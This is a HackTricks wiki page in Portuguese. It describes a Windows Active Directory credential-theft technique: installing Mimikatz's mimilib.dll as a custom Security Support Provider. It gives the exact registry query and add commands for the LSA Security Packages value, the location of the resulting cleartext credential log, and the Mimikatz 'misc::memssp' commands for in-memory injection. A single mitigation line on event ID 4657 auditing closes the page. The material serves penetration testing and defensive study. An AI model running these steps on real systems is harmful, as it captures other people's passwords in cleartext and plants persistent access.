hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2023-06-06 18:56:34 +00:00

4.7 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

SSP Personalizado

Veja o que é um SSP (Security Support Provider) aqui.
Você pode criar seu próprio SSP para capturar em texto claro as credenciais usadas para acessar a máquina.

Mimilib

Você pode usar o binário mimilib.dll fornecido pelo Mimikatz. Isso registrará em um arquivo todas as credenciais em texto claro.
Coloque o dll em C:\Windows\System32\
Obtenha uma lista de pacotes de segurança LSA existentes:

{% code title="atacante@alvo" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Adicione mimilib.dll à lista de provedores de suporte de segurança (Security Packages):

PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

E após uma reinicialização, todas as credenciais podem ser encontradas em texto claro em C:\Windows\System32\kiwissp.log

Na memória

Você também pode injetar isso diretamente na memória usando o Mimikatz (observe que pode ser um pouco instável/não funcionar):

privilege::debug
misc::memssp

Isso não sobreviverá a reinicializações.

Mitigação

ID do evento 4657 - Auditoria da criação/mudança de HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥